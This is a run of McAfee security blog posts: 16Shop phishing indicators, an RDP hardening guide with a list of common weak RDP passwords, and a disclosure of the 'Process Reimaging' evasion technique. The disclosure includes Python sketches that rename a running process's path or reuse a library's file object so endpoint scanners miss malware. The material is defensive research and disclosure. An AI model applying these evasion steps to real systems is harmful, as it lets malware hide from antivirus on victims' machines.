The group responsible for the 16Shop kit continues to develop and evolve the kit to target a larger audience. To protect themselves, users need to be extremely vigilant when receiving unsolicited email and messages.

This demonstrates how malicious actors leverage legitimate companies in their attacks to gain victims’ trust, and we expect these kinds of groups to use other companies as bait in the future.

Indicators of compromise

Domains (all blocked by McAfee WebAdvisor)

Apple Kit

  • hxxps://secure2app-accdetall1.usa.cc.servsdlay.com/?16shop
  • hxxps://gexxodaveriviedt0.com/app1esubm1tbybz/?16shop
  • hxxps://gexxodaveriviedt0.com/secur3-appleld-verlfy1/?16shop
  • hxxps://sec2-accountdetail.accsdetdetail.com/?16shop

Amazon Kit

  • verification-amazonaccess.secure.dragnet404.com/
  • verification-amazon.servicesinit-id.com/
  • verification-amazonlocked.securesystem.waktuakumaleswaecdvhb.com/
  • verification-amazonaccess.jaremaubalenxzbhcvhsd.business/
  • verification-amazon.3utilities.com/
  • verification-amaz0n.com/

McAfee detections

  • PDF/16shop! (V2 DAT = 9086, V3 DAT = 3537)

Hashes (SHA-256)

  • 34f33612c9f6b132430385e6dc3f8603ff897d34c780bfa5a4cf7663922252ba
  • b43c2ba4e312d36a1b7458d1342600957e0daf3d1fcd8c7324afd387772f2cc0
  • 569612bd90de1a3a5d959abb12f0ec66f3696113b386e4f0e3a9face084b032a
  • d9070e68911db893dfe3b6acc8a8995658f2796da44f14469c73fbcb91cd1f73

For more information on phishing attacks:

The post 16Shop Now Targets Amazon appeared first on McAfee Blogs.

RDP Security Explained

RDP on the Radar

Recently, McAfee released a blog related to the wormable RDP vulnerability referred to as CVE-2019-0708 or “Bluekeep.” The blog highlights a particular vulnerability in RDP which was deemed critical by Microsoft because it is exploitable over a network connection without authentication. These attributes make it particularly ‘wormable’ – it can easily be coded to spread itself by reaching out to other accessible networked hosts, similar to the famous EternalBlue exploit of 2017. This seems particularly relevant when (at the time of writing) 3,865,098 instances of port 3389 are showing as open on Shodan.

Prior to this, RDP was already on our radar. Last July, McAfee ATR did a deep dive on Remote Desktop Protocol (RDP) marketplaces and described the sheer ease with which cybercriminals can obtain access to a large variety of computer systems, some of which are very sensitive. One of the methods of RDP misuse that we discussed was how it could aid deploying a targeted ransomware campaign. At that time one of the most prolific targeted ransomware groups was SamSam. To gain an initial foothold on its victims’ networks, SamSam would often rely on weakly protected RDP access. From its RDP launchpad, it would proceed to move laterally through a victim’s network, successfully exploiting and discovering additional weaknesses, for instance in a company’s Active Directory (AD).

In November 2018, the FBI and the Justice department indicted two Iranian men for developing and spreading the SamSam ransomware extorting hospitals, municipalities and public institutions, causing over $30 million in losses. Unfortunately, this did not stop other cybercriminals from using similar tactics, techniques and procedures (TTPs).

The sheer number of vulnerable systems in the wild make it a “target” rich environment for cybercriminals.

In the beginning of 2019 we dedicated several blogs to the Ryuk ransomware family that has been using RDP as an initial entry vector. Even though RDP misuse has been around for many years, it does seem to have gained an increased popularity amongst criminals focused on targeted ransomware.

Recent statistics showed that RDP is the most dominant attack vector, being used in 63.5% of disclosed targeted ransomware campaigns in Q1 of 2019.

Source: Coveware Q1 statistics

Securing RDP

Given the dire circumstances highlighted above it is wise to question if externally accessible RDP is an absolute necessity for any organization. It is also wise to consider how to better secure RDP if you are absolutely reliant on it. The good news is there are several easy steps that help an organization to better secure RDP access.

That is why, in this blog, we will use the adversarial knowledge from the McAfee ATR red team to explain what easy measures can be undertaken to harden RDP access.

These recommendations are in addition to standard system hygiene, which should be carried out for all systems (although it becomes more important for Internet-connected hosts), such as keeping all software up to date, and we intentionally avoid ‘security through obscurity’ items such as changing the RDP port number.

Do not allow RDP connections over the open Internet

To be very clear… RDP should never be open to the Internet. The internet is continuously being scanned for open port 3389 (the default RDP port). Even with a complex password policy and multi-factor authentication you can be vulnerable to denial of service and user account lockout. A much safer alternative is to use a Virtual Private Network (VPN). A VPN will allow a remote user to securely access their corporate network without exposing their computer to the entire Internet. The connection is mutually encrypted, providing authentication for both client and server, preferably using a dual factor, while creating a secure tunnel to the corporate network. As you only have access to the network you will still need to RDP to the computer but can do so more securely without exposing it to the internet.

Use Complex Passwords

An often-used alternative meaning for RDP is “Really Dumb Passwords.” That short phrase encapsulates the number one vulnerability of RDP systems: attackers simply scan the internet for systems that accept RDP connections and launch a brute-force attack with popular tools such as ForcerX, NLBrute, Hydra or RDP Forcer to gain access.

Using complex passwords will make brute-force RDP attacks harder to succeed.

Below are the top 15 passwords used on vulnerable RDP systems. We built this list based on information on weak passwords shared by a friendly law enforcement agency from taken-down RDP shops. What is most shocking is that a large number of vulnerable RDP systems did not even have a password.

The TOP 15 used passwords on vulnerable RDP systems

[no password]
123456
P@ssw0rd
123
Password1
1234
password
1
12345
Password123
admin
test
test123
Welcome1
scan

Use Multi-Factor Authentication

In addition to a complex password, it is best practice to use multi-factor authentication. Even with great care and diligence, a username and password can still be compromised. If legitimate credentials have been compromised, multi-factor authentication adds an additional layer of protection by requiring the user to provide a security token, e.g. a code received by notification or a biometric verification. Better yet, a FIDO-based authentication device can provide an extra factor which is not vulnerable to spoofing attacks, unlike other one-time-password (OTP) mechanisms. This increases the difficulty for an unauthorized person to gain access to the computing device.

Use an RDP Gateway

Recent versions of Windows Server provide an RDP gateway server. This provides one external interface to many internal RDP endpoints, thus simplifying management, including many of the items outlined in the following recommendations. These include logging, TLS certificates, authentication to the end device without actually exposing it to the Internet, authorization to internal hosts, user restrictions, etc.

Microsoft provides detailed instructions for configuration of remote desktop gateway server, for Windows Server 2008 R2 as an example, over here.

Lock out users and block or timeout IPs that have too many failed logon attempts

A high number of failed logon attempts is a strong indication of a brute force attack. Limiting the number of logon attempts per user can prevent such attacks. A failed logon attempt is logged under Windows Event ID 4625. An RDP logon falls under logon type 10, RemoteInteractive. The account lockout threshold can be specified in the local group policy under security settings: Account Policies.

For logging purposes, it is best to log both failed and successful logons. Additionally, it is important to note that the “specific security layer for RDP connections” setting needs to be enabled; otherwise, you will be unable to tell whether the logon attempt came over RDP or see the source IP address. A comparison is shown below.

Event log network logon (type 3) note no source network address

Event log RDP logon (type 10) note the source network address present
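As a quick way to review such events, the Security log can be queried for Event ID 4625 with the built-in wevtutil tool, wrapped here in a short Python sketch for convenience. RDP attempts appear with logon type 10 and, with the security layer configured as described above, a source network address.

```python
# Sketch: pull recent failed logon events (Event ID 4625) from the Security log
# using the built-in wevtutil tool. Run from an elevated prompt on the RDP host.
import subprocess

result = subprocess.run(
    [
        "wevtutil", "qe", "Security",
        "/q:*[System[(EventID=4625)]]",   # failed logon attempts
        "/c:20",                          # last 20 matching events
        "/rd:true",                       # newest first
        "/f:text",
    ],
    capture_output=True, text=True, check=True,
)
# Look for "Logon Type: 10" entries and their Source Network Address fields.
print(result.stdout)
```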

Use a Firewall to restrict access

Firewall rules can be created to restrict Remote Desktop access so that only a specific IP address or a range of IP addresses can access a given device. This can be achieved by simply opening “Windows Firewall with Advanced Security,” clicking on Inbound Rules and scrolling down to the RDP rule. A screen shot can be seen below.

Firewall settings for inbound RDP connections 

Enable Restricted Admin Mode

When connecting to a remote machine via RDP, credentials are stored on that machine and may be retrievable by other users of the system (e.g. malicious attackers). Microsoft has added restricted admin mode, which instructs the RDP server not to store credentials of users who log in. Behind the scenes, the server now uses ‘network’ login rather than ‘interactive’ and therefore uses hashes or Kerberos tickets rather than passwords for authentication. Assessment of the pros and cons of this option is recommended before enabling it in your environment. On the negative side, the use of network login exposes the possibility of credential reuse (pass-the-hash) attacks against the RDP server. Pass the hash is likely possible anyway, internally, via other exposed ports, so it may not significantly increase exposure there; but when enabling this option on Internet-facing servers, where other ports are likely (and should be!) restricted, pass the hash is then extended to the Internet. Given the pros and cons, avoiding internal escalation of privilege is often prioritized and therefore restricted admin mode is enabled.

Microsoft TechNet describes configuration and usage of restricted mode here.

Encryption

There are four levels of encryption supported by standard RDP: Low, Client Compatible, High, and FIPS Compliant. This is configured on the Remote Desktop server. This can be further improved upon by using Enhanced RDP Security. When Enhanced RDP security is used, encryption and server authentication are implemented by external security protocols, e.g. TLS or CredSSP. One of the key benefits of Enhanced RDP Security is that it enables the use of Network Level Authentication (NLA) when using CredSSP as the external security protocol.

Certificate management is always a complexity, but Microsoft does provide this through the use of Active Directory Certificate Services (ADCS). Certificates can be pushed using Group Policy Objects (GPO) where this is available. Incompatible operating system environments must import certificates via the web interface exposed at https://<server>/Certsrv.

Enable Network Level Authentication (NLA)

To reduce the amount of initially required server resources, and thereby mitigate against denial of service attacks, network level authentication (NLA) can be used. Within this mode, strong authentication takes place before the remote desktop connection is established, using the Credential Security Support Provider (CredSSP) either through TLS or Kerberos. NLA can also help to protect against man-in-the-middle attacks, where credentials are intercepted. However, be aware that NLA over NTLM does not provide strong authentication and should be disabled in favor of NLA over TLS (with valid certificates).

Microsoft TechNet describes configuration and usage of NLA in Windows Server 2008 R2 here.

Interestingly, BlueKeep, mentioned above, is partially mitigated by having NLA enabled. As reported by Microsoft in the associated advisory “With NLA turned on, an attacker would first need to authenticate to Remote Desktop Services using a valid account on the target system before the attacker could exploit the vulnerability.”

Restrict users who can logon using RDP

All administrators can use RDP by default. Remote access should be limited to only the accounts that require it. If all administrators do not need remote access you should consider removing the Administrator account from the RDP access group. You can then add the specific users which require access to the “Remote Desktop Users” group. See here for more information on managing users in your RDS collection.

Minimize the Number of Local Administrator Accounts

Local administrator accounts provide an attack vector for attackers who gain access to a system. Credentials can be cracked offline and more accounts means more likelihood of a successful crack. Therefore, you should aim for a maximum of one local administrator account which is secured appropriately.

Ensure that Local Administrator Accounts are Unique

If the local administrator accounts match those assigned to their counterparts on other systems within the server’s internal network, the attacker can potentially re-use credentials to move laterally. This issue occurs quite frequently, so Microsoft provided Local Administrator Password Solution (LAPS) as a means to avoid this scenario across the organization with central management of unique local administrator credentials. This is particularly relevant for externally exposed systems.

Microsoft provides a download and usage information for LAPS here.

Limit Domain Administrator Account Access

Accounts within the domain admins group have full control of the domain by default, by virtue of being part of the administrators group for all domain controllers, domain workstations and domain member servers. If a credential for a domain admin account is retrieved from the RDP server, the attacker now holds the ‘keys to the kingdom’ and is in full control of the entire domain. You should reduce the amount of domain administrators within the organization in general and avoid accessing the RDP server or other externally exposed systems via these accounts, to avoid inadvertently making credentials accessible.

In general, ‘least privilege’ administration models should be used. Microsoft provides guidance in this area, including how best to use domain admin accounts, here.

Consider Placement Within the Network

Where possible, RDP servers should be placed within a DMZ or other restricted area of the network. The idea here is that if an attack is successful, its scope is reduced and confined to the RDP server alone. Often RDP is exposed specifically to allow external users onto the network, so this may not be a feasible solution, however it should be considered and the quantity of services reachable within the internal network should be minimized.

Consider using an account-naming convention that does not reveal organizational information

There are many options for account naming conventions, ranging from firstname.lastname to not deriving usernames from name data; all having their pros and cons. However, some of the more commonly used account naming conventions such as firstname.lastname, make it very easy to guess usernames and email addresses. This can be a security concern as spammers and hackers will readily use this information.

Conclusion

When trying to run an efficient IT organization, having remote access to certain computer systems might be essential. Unfortunately, when not implemented correctly, the tools that make remote access possible also open your systems up to unwanted guests. In the last few years there have been far too many examples of where vulnerable RDP access gave way to a full-scale network compromise.

In this article we have shown that RDP access can be hardened with some easy steps. Please take the time to review your RDP security posture.

The post RDP Security Explained appeared first on McAfee Blogs.

Why Process Reimaging Matters

As this blog goes live, Eoin Carroll will be stepping off the stage at Hack in Paris having detailed the latest McAfee Advanced Threat Research (ATR) findings on Process Reimaging.  Admittedly, this technique probably lacks a catchy name, but be under no illusion: the technique is significant and worth paying very close attention to.

Plain and simple, the objective of malicious threat actors is to bypass endpoint security. It is this exact game of cat and mouse that the security industry has been playing with malware writers for years, and one that, quite frankly, will continue. This ongoing battle will shape the future of cyber, and drive innovation in attack techniques and the ways in which we defend against them.  As part of this process it is crucial that we, the McAfee ATR team, continually identify techniques that could be used by malicious actors successfully.  It is this work that has led to the identification of a technique we call Process Reimaging, which was successful in bypassing endpoint security solutions (ESSs). To be clear, our objective is to stay ahead of malicious actors in identifying evasion techniques, with the broader goal of providing a safer computing environment for all organizations.

This technique is detailed by Eoin in a comprehensive technical blog titled In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass. The following is a summary of the findings.

Process Reimaging targets non-EDR ESSs. It is a post-exploitation technique, meaning it targets users who have already fallen victim, for example to a phishing or drive-by-download attack, so that the malicious process can execute undetected and dwell on an endpoint for a significant period of time. The Windows kernel exports functionality to support the user-mode components of ESSs, which depend on it for protection and detection capabilities. Numerous APIs, such as K32GetProcessImageFileName, allow ESSs “to verify a process attribute to determine whether it contains malicious binaries and whether it can be trusted to call into its infrastructure.” Our research focused on this functionality because the APIs return stale and inconsistent FILE_OBJECT paths, which potentially allows a malicious actor to bypass the process attribute verification undertaken by the Windows operating system. To be more precise, this allowed McAfee ATR to develop a proof-of-concept that was not detected by Windows Defender and will not be detected until a signature is created to block the file on disk before the process itself is created, or a full scan is executed.

This technique succeeds because the ESS relies on the Windows operating system to verify process attributes. The ESS will naturally trust a process whose file on disk appears non-malicious, since it assumes the OS has identified the correct file on disk associated with that process for the ESS to scan.

Releasing details of the technique

With the public release of security research, there is always a significant risk that any released information can be utilized by adversaries for nefarious activities. The balance of security research versus irresponsible disclosure is an issue we continually wrestle with, and these findings are no different. In the process of conducting due diligence, we were able to identify the use of Process Doppelganging, with Process Hollowing as its fallback defense evasion technique, within the SynAck ransomware in 2018. Since the Process Doppelganging technique was weaponized within SynAck ransomware less than five months after its disclosure at Black Hat Europe in 2017, we can only assume that the Process Reimaging technique is, or soon will be, close to usage by threat actors to bypass detection.

The post Why Process Reimaging Matters appeared first on McAfee Blogs.

In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass

Process Reimaging Overview

The Windows Operating System has inconsistencies in how it determines process image FILE_OBJECT locations, which impacts the ability of non-EDR (Endpoint Detection and Response) Endpoint Security Solutions, such as Microsoft Defender real-time protection, to detect the correct binaries loaded in malicious processes. This inconsistency has led McAfee’s Advanced Threat Research to develop a new post-exploitation evasion technique we call “Process Reimaging”. This technique is equivalent in impact to Process Hollowing or Process Doppelganging within the Mitre ATT&CK Defense Evasion category; however, it is much easier to execute as it requires no code injection. While this bypass has been successfully tested against current versions of Microsoft Windows and Defender, it is highly likely that the bypass will work on any endpoint security vendor or product implementing the APIs discussed below.

The Windows Kernel, ntoskrnl.exe, exposes functionality through NTDLL.dll APIs to support User-mode components such as Endpoint Security Solution (ESS) services and processes. One such API is K32GetProcessImageFileName, which allows ESSs to verify a process attribute to determine whether it contains malicious binaries and whether it can be trusted to call into its infrastructure. The Windows Kernel APIs return stale and inconsistent FILE_OBJECT paths, which enable an adversary to bypass Windows operating system process attribute verification. We have developed a proof-of-concept which exploits this FILE_OBJECT location inconsistency by hiding the physical location of a process EXE.
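To make that dependency concrete, the sketch below shows how a user-mode component can ask the operating system which file backs a process via K32GetProcessImageFileName, called here from Python through ctypes purely for illustration; an ESS would make the equivalent native call. If the returned path is stale, any verdict based on it is rendered against the wrong file.

```python
# Sketch: asking the OS which image file backs a running process, the way a
# user-mode ESS component might. Python/ctypes is used for illustration only.
import ctypes
from ctypes import wintypes

PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.OpenProcess.restype = wintypes.HANDLE
kernel32.OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
kernel32.CloseHandle.argtypes = [wintypes.HANDLE]

def image_path_for_pid(pid: int) -> str:
    handle = kernel32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        buf = ctypes.create_unicode_buffer(wintypes.MAX_PATH)
        # Returns an NT device path, e.g. \Device\HarddiskVolumeX\...\app.exe
        if not kernel32.K32GetProcessImageFileNameW(handle, buf, len(buf)):
            raise ctypes.WinError(ctypes.get_last_error())
        return buf.value
    finally:
        kernel32.CloseHandle(handle)

# A scanner would open and inspect the file at this path; if the path is stale,
# the verdict is rendered against the wrong file.
print(image_path_for_pid(1234))  # replace 1234 with a PID of interest
```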

The PoC allowed us to persist a malicious process (post exploitation) which does not get detected by Windows Defender.

The Process Reimaging technique cannot be detected by Windows Defender until it has a signature for the malicious file and blocks it on disk before process creation, or performs a full scan on the suspect machine post compromise to detect the file on disk. In addition to Process Reimaging weaponization and protection recommendations, this blog includes a technical deep dive on reversing the Windows kernel APIs for process attribute verification and on the Process Reimaging attack vectors. We use the SynAck ransomware as a case study to illustrate the impact of Process Reimaging relative to Process Hollowing and Doppelganging; this illustration does not relate to Windows Defender’s ability to detect Process Hollowing or Doppelganging, but to the subverting of trust for process attribute verification.

Antivirus Scanner Detection Points

When an Antivirus scanner is active on a system, it will protect against infection by detecting running code which contains malicious content, and by detecting a malicious file at write time or load time.

The actual sequence for loading an image is as follows:

  • FileCreate – the file is opened to be able to be mapped into memory.
  • Section Create – the file is mapped into memory.
  • Cleanup – the file handle is closed, leaving a kernel object which is used for PAGING_IO.
  • ImageLoad – the file is loaded.
  • CloseFile – the file is closed.

If the Antivirus scanner is active at the point of load, it can use any one of the above steps (1,2 and 4) to protect the operating system against malicious code. If the virus scanner is not active when the image is loaded, or it does not contain definitions for the loaded file, it can query the operating system for information about which files make up the process and scan those files. Process Reimaging is a mechanism which circumvents virus scanning at step 4, or when the virus scanner either misses the launch of a process or has inadequate virus definitions at the point of loading.

There is currently no documented method to securely identify the underlying file associated with a running process on Windows.

This is due to Windows’ inability to retrieve the correct image filepath from the NTDLL APIs. This can be shown to evade Defender (MsMpEng.exe/MpEngine.dll) where the file being executed is a “Potentially Unwanted Program” such as mimikatz.exe. If Defender is enabled during the launch of mimikatz, it detects it at step 1 or 2 correctly. If Defender is not enabled, or the launched program is not recognized by its current signature files, the file is allowed to launch. Once Defender is enabled, or the signatures are updated to include detection, Defender uses K32GetProcessImageFileName to identify the underlying file. If the process has been created using our Process Reimaging technique, the running malware is no longer detected. Therefore, any security service auditing running programs will fail to identify the files associated with the running process.

Subverting Trust

The Mitre ATT&CK model specifies post-exploitation tactics and techniques used by adversaries, based on real-world observations for Windows, Linux and macOS Endpoints per figure 1 below.

Figure 1 – Mitre Enterprise ATT&CK

Once an adversary gains code execution on an endpoint, before lateral movement, they will seek to gain persistence, privilege escalation and defense evasion capabilities. They can achieve defense evasion using process manipulation techniques to get code executing in a trusted process. Process manipulation techniques have existed for a long time and evolved from Process Injection to Hollowing and Doppelganging with the objective of impersonating trusted processes. There are other Process manipulation techniques as documented by Mitre ATT&CK and Unprotect Project,  but we will focus on Process Hollowing and Process Doppelganging. Process manipulation techniques exploit legitimate features of the Windows Operating System to impersonate trusted process executable binaries and generally require code injection.

ESSs place inherent trust in the Windows Operating System for capabilities such as digital signature validation and process attribute verification. As demonstrated by Specter Ops, ESSs’ trust in the Windows Operating system could be subverted for digital signature validation.

Similarly, Process Reimaging subverts an ESSs’ trust in the Windows Operating System for process attribute verification.

When a process is trusted by an ESS, it is perceived to contain no malicious code and may also be trusted to call into the ESS trusted infrastructure.

McAfee ATR uses the Mitre ATT&CK framework to map adversarial techniques, such as defense evasion, with associated campaigns. This insight helps organizations understand adversaries’ behavior and evolution so that they can assess their security posture and respond appropriately to contain and eradicate attacks. McAfee ATR creates and shares Yara rules based on threat analysis to be consumed for protect and detect capabilities.

Process Manipulation Techniques (SynAck Ransomware)

McAfee Advanced Threat Research analyzed SynAck ransomware in 2018 and discovered it used Process Doppelganging with Process Hollowing as its fallback defense evasion technique. We use this malware to explain the Process Hollowing and Process Doppelganging techniques, so that they can be compared to Process Reimaging based on a real-world observation.

Process Manipulation defense evasion techniques continue to evolve. Process Doppelganging was publicly announced in 2017, requiring advancements in ESSs for protection and detection capabilities. Because process manipulation techniques generally exploit legitimate features of the Windows Operating system they can be difficult to defend against if the Antivirus scanner does not block prior to process launch.

Process Hollowing

“Process hollowing occurs when a process is created in a suspended state, then its memory is unmapped and replaced with malicious code. Execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis” (see figure 2 below).

Figure 2 – SynAck Ransomware Defense Evasion with Process Hollowing

Process Doppelganging

“Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging’s use of Windows Transactional NTFS (TxF) also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext” (see figure 3 below).

Figure 3 – SynAck Ransomware Defense Evasion with Doppleganging

Process Reimaging Weaponization

The Windows Kernel APIs return stale and inconsistent FILE_OBJECT paths which enable an adversary to bypass windows operating system process attribute verification. This allows an adversary to persist a malicious process (post exploitation) by hiding the physical location of a process EXE (see figure 4 below).

Figure 4 – SynAck Ransomware Defense Evasion with Process Reimaging

Process Reimaging Technical Deep Dive

NtQueryInformationProcess retrieves all process information from EPROCESS structure fields in the kernel, and NtQueryVirtualMemory retrieves information from the Virtual Address Descriptors (VADs) field in the EPROCESS structure.

The EPROCESS structure contains filename and path information at the following fields/offsets (see figure 5 below):

  • +0x3b8 SectionObject (filename and path)
  • +0x448 ImageFilePointer* (filename and path)
  • +0x450 ImageFileName (filename)
  • +0x468 SeAuditProcessCreationInfo (filename and path)

* this field is only present in Windows 10

Figure 5 – Code Complexity IDA Graph Displaying NtQueryInformationProcess Filename APIs within NTDLL

Kernel API NtQueryInformationProcess is consumed by the following kernelbase/NTDLL APIs:

  • K32GetModuleFileNameEx
  • K32GetProcessImageFileName
  • QueryFullProcessImageName

The VADs hold a pointer to FILE_OBJECT for all mapped images in the process, which contains the filename and filepath (see figure 6 below).

Kernel API NtQueryVirtualMemory is consumed by the following kernelbase/NTDLL API:

  • GetMappedFileName

Figure 6 – Code Complexity IDA Graph Displaying NtQueryVirtualMemory Filename API within NTDLL

Windows fails to update any of the above kernel structure fields when a FILE_OBJECT filepath is modified post-process creation. Windows does update FILE_OBJECT filename changes, for some of the above fields.

The VADs reflect any filename change for a loaded image after process creation, but they don’t reflect any rename of the filepath.

The EPROCESS fields also fail to reflect any renaming of the process filepath and only the ImageFilePointer field reflects a filename change.

As a result, the APIs exported by NtQueryInformationProcess and NtQueryVirtualMemory return incorrect process image file information when called by ESSs or other Applications (see Table 1 below).

Table 1 OS/Kernel version and API Matrix

Prerequisites for all Attack Vectors

Process Reimaging targets the post-exploitation phase, whereby a threat actor has already gained access to the target system. This is the same prerequisite as for the Process Hollowing or Doppelganging techniques within the Defense Evasion category of the Mitre ATT&CK framework.

Process Reimaging Attack Vectors

FILE_OBJECT Filepath Changes

Simply renaming the filepath of an executing process results in Windows OS returning the incorrect image location information for all APIs (See figure 7 below).  This impacts all Windows OS versions at the time of testing.

Figure 7 FILE_OBJECT Filepath Changes – Filepath Changes Impact all Windows OS versions
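A simplified sketch of this vector is shown below: it copies a benign binary, runs it, and renames its directory while the process is running. The paths are illustrative and this is not the ATR proof-of-concept code.

```python
# Simplified sketch (assumption): the FILE_OBJECT filepath-change vector.
# Copy a benign binary, run it, rename its directory while it is running, and
# the OS keeps reporting the original path. Paths below are illustrative.
import os
import shutil
import subprocess
import time

old_dir, new_dir = r"C:\temp\dir_a", r"C:\temp\dir_b"
os.makedirs(old_dir, exist_ok=True)
exe = shutil.copy(r"C:\Windows\System32\notepad.exe", old_dir)

proc = subprocess.Popen([exe])   # stand-in for a malicious payload
time.sleep(1)
os.rename(old_dir, new_dir)      # rename the filepath after process creation

# From this point on, kernel-backed APIs such as K32GetProcessImageFileName
# still report ...\dir_a\notepad.exe for proc.pid even though the file now
# lives under dir_b, so a scanner resolving the reported path finds nothing.
```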

FILE_OBJECT Filename Changes

Filename Change >= Windows 10

Simply renaming the filename of an executing process results in Windows OS returning the incorrect image information for K32GetProcessImageFileName API (See figure 8.1.1 below). This has been confirmed to impact Windows 10 only.

Figure 8.1.1 FILE_OBJECT Filename Changes – Filename Changes impact Windows >= Windows 10

Per figure 8.1.2 below, GetModuleFileNameEx and QueryFullProcessImageName will get the correct filename changes due to a new EPROCESS field, ImageFilePointer, at offset 0x448.  The instruction there (mov r12, [rbx+448h]) references the ImageFilePointer at offset 0x448 into the EPROCESS structure.

Figure 8.1.2 NtQueryInformationProcess (Windows 10) – Windows 10 RS1 x64 ntoskrnl version 10.0.14393.0

Filename Change < Windows 10

Simply renaming the filename of an executing process results in Windows OS returning the incorrect image information for the K32GetProcessImageFileName, GetModuleFileNameEx and QueryFullProcessImageName APIs (see figure 8.2.1 below). This has been confirmed to impact Windows 7 and Windows 8.

Figure 8.2.1 FILE_OBJECT Filename Changes – Filename Changes Impact Windows < Windows 10

Per figure 8.2.2 below, GetModuleFileNameEx and QueryFullProcessImageName will get the incorrect filename (PsReferenceProcessFilePointer references EPROCESS offset 0x3b8, SectionObject).

Figure 8.2.2 NtQueryInformationProcess (Windows 7 and 8) – Windows 7 SP1 x64 ntoskrnl version 6.1.7601.17514

LoadLibrary FILE_OBJECT reuse

LoadLibrary FILE_OBJECT reuse leverages the fact that when a LoadLibrary or CreateProcess is called after a LoadLibrary and FreeLibrary on an EXE or DLL, the process reuses the existing image FILE_OBJECT in memory from the prior LoadLibrary.

Exact Sequence is:

  1. LoadLibrary (path\filename)
  2. FreeLibrary (path\filename)
  3. LoadLibrary (renamed path\filename) or CreateProcess (renamed path\filename)

This results in Windows creating a VAD entry in the process at step 3 above, which reuses the same FILE_OBJECT still in process memory, created from step 1 above. The VAD now has incorrect filepath information for the file on disk and therefore the GetMappedFileName API will return the incorrect location on disk for the image in question.

The following prerequisites are required to evade detection successfully:

  • The LoadLibrary or CreateProcess must use the exact same file on disk as the initial LoadLibrary
  • Filepath must be renamed (dropping the same file into a newly created path will not work)
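Putting the sequence and prerequisites together, the following is a simplified sketch of the reuse trick, driven from Python/ctypes for illustration. The paths are placeholders and this is not the ATR proof-of-concept.

```python
# Sketch (assumption): the three-step LoadLibrary FILE_OBJECT reuse sequence
# described above, driven from Python/ctypes for illustration. Paths are
# placeholders; the file on disk must be the very same file, only its path renamed.
import ctypes
import os
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.LoadLibraryW.restype = wintypes.HMODULE
kernel32.LoadLibraryW.argtypes = [wintypes.LPCWSTR]
kernel32.FreeLibrary.argtypes = [wintypes.HMODULE]

original = r"C:\temp\payload_dir\payload.dll"    # placeholder path
renamed_dir = r"C:\temp\renamed_dir"

# Step 1: LoadLibrary creates the image FILE_OBJECT within this process.
module = kernel32.LoadLibraryW(original)

# Step 2: FreeLibrary unmaps the image, but the FILE_OBJECT can linger in memory.
kernel32.FreeLibrary(module)

# Rename the filepath (dropping an identical file into a new path will not work).
os.rename(os.path.dirname(original), renamed_dir)

# Step 3: loading the renamed path reuses the stale FILE_OBJECT, so the new VAD
# entry, and therefore GetMappedFileName, reports the old, now-wrong location.
kernel32.LoadLibraryW(os.path.join(renamed_dir, os.path.basename(original)))
```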

The Process Reimaging technique can be used in two ways with LoadLibrary FILE_OBJECT reuse attack vector:

  1. LoadLibrary (see figure 9 below)
    1. When an ESS or Application calls the GetMappedFileName API to retrieve a memory-mapped image file, Process Reimaging will cause Windows OS to return the incorrect path. This impacts all Windows OS versions at the time of testing.

Figure 9 LoadLibrary FILE_OBJECT Reuse (LoadLibrary) – Process Reimaging Technique Using LoadLibrary Impacts all Windows OS Versions

2. CreateProcess (See figure 10 below)

    1. When an ESS or Application calls the GetMappedFileName API to retrieve the process image file, Process Reimaging will cause Windows OS to return the incorrect path. This impacts all Windows OS versions at the time of testing.

Figure 10 LoadLibrary FILE_OBJECT Reuse (CreateProcess) – Process Reimaging Technique using CreateProcess Impacts all Windows OS Versions

Process Manipulation Techniques Comparison

Windows Defender Process Reimaging Filepath Bypass Demo

This video simulates zero-day malware (a Mimikatz PUP sample) being dropped to disk and executed as the malicious process “phase1.exe”. Using the Process Reimaging filepath attack vector we demonstrate that, even if Defender is updated with a signature for the malware on disk, it will not detect the running malicious process. Therefore, for non-EDR ESSs such as Defender real-time protection (used by consumers and also enterprises), the malicious process can dwell on a Windows machine until a reboot or until the machine receives a full scan post signature update.

CVSS and Protection Recommendations

CVSS

If a product uses any of the APIs listed in table 1 for the following use cases, then it is likely vulnerable:

  1. Process reputation of a remote process – any product using the APIs to determine if executing code is from a malicious file on disk

CVSS score 5.0 (Medium)  https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N (same score as Doppelganging)

  2. Trust verification of a remote process – any product using the APIs to verify trust of a calling process

CVSS score will be higher than 5.0; scoring specific to Endpoint Security Solution architecture

Protection Recommendations

McAfee Advanced Threat Research submitted the Process Reimaging technique to Microsoft on June 5th, 2018. Microsoft released a partial mitigation to Defender in the June 2019 cumulative update for the Process Reimaging FILE_OBJECT filename changes attack vector only. This update was only for Windows 10 and does not address the vulnerable APIs in Table 1 at the OS level; therefore, ESSs are still vulnerable to Process Reimaging. Defender also remains vulnerable to the FILE_OBJECT filepath changes attack vector executed in the bypass demo video, and this attack vector affects all Windows OS versions.

New and existing Process Manipulation techniques which abuse legitimate Operating System features for defense evasion are difficult to prevent dynamically by monitoring specific API calls as it can lead to false positives such as preventing legitimate processes from executing.

A process which has been manipulated by Process Reimaging will be trusted by the ESS unless it has been traced by EDR or a memory scan which may provide deeper insight.

Mitigations recommended to Microsoft
  1. File System Synchronization (EPROCESS structures out of sync with the filesystem or File Control Block (FCB) structure)
    1. Allow the EPROCESS structure fields to reflect filepath changes as is currently implemented for the filename in the VADs and EPROCESS ImageFilePointer fields.
    2. There are other EPROCESS fields which do not reflect changes to filenames and need to be updated, such as K32GetModuleFileNameEx on Windows 10 through the ImageFilePointer.
  2. API Usage (most returning file info for process creation time)
    1. Defender (MpEngine.dll) currently uses K32GetProcessImageFileName to get process image filename and path when it should be using K32GetModuleFileNameEx.
